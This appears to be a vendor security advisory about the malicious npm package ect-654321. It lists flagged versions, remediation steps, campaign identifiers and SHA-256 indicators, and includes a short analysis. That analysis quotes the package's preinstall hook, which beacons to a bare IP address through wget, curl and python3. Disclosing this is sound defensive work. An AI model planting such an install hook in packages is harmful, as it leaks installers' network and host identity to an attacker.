Which versions of ect-654321 are malicious?

The following npm versions of ect-654321 are flagged malicious: 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.7, 100.0.8. Treat any of these as compromised.

How do I remediate ect-654321 if I installed it?

Remove ect-654321 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is ect-654321 part of a known attack campaign?

Yes — ect-654321 is associated with the IN-MAL-2026-006261, IN-MAL-2026-006254, IN-MAL-2026-006249, IN-MAL-2026-006247, IN-MAL-2026-006264, IN-MAL-2026-006258, IN-MAL-2026-006256 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect ect-654321 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking ect-654321 and packages like it before any post-install script runs.

Malicious package

ect-654321npm

Malicious code in ect-654321 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5719

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall ect-654321

What this malware does

ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget http://10.107.121.85:8000/callback_wget_654321 || curl http://10.107.121.85:8000/callback_curl_654321 || python3 -c...urlopen('http://10.107.121.85:8000/callback_py_654321') on npm install. The destination is a bare RFC1918 IP on plain HTTP with no documented purpose, and the callback path embeds the package version as a probe identifier. The package ships no library code, no main entry, and an empty author field with description 'Probe', so the only effect of installing it is the outbound beacon. This shape — empty placeholder package + version-numbered callback path + bare-IP HTTP fetch in preinstall — is a dependency-confusion / namespace-probing payload that confirms reachability of the installer's network to the operator and leaks the installer's source IP, DNS resolver, and host identity. The triple-fallback (wget/curl/python3) ensures the beacon fires across diverse install environments. Whether published as red-team research or real attack tooling, the install-time behavior is identical and harmful to any installer that pulls the package.

Malicious versions

7 flagged

100.0.0100.0.1100.0.2100.0.3100.0.4100.0.7100.0.8

Indicators of compromise (SHA-256)

0dd80b0b726617e2c81c5719de07ec2f758418969a127479a4d1ced0a6ca92aa

ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540

12d348b2976b56bca5f0143d3b4826cb307666fd1eef63856ce068546da38b5c

3dfd4e0c673827c4ef14ad67fb37776acc2cba76c72465df7098f7d88b38c2c6

4a85e1658ff74a90256e56d6c50bd579431c8abbba856b8c4cc4252268def993

70deda2f7dfa7c103e4c1054eb890013a5ef3b8826e5fec007fbcc00a91fbba7

ddb34c7c8d1f3d36dbd8e0d0913de11a34ae2b3c2b69650790718a1994597b6e

Frequently asked questions

No. ect-654321 on npm has been identified as a malicious package (versions 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.7, 100.0.8 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006261IN-MAL-2026-006254IN-MAL-2026-006249IN-MAL-2026-006247IN-MAL-2026-006264IN-MAL-2026-006258IN-MAL-2026-006256

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection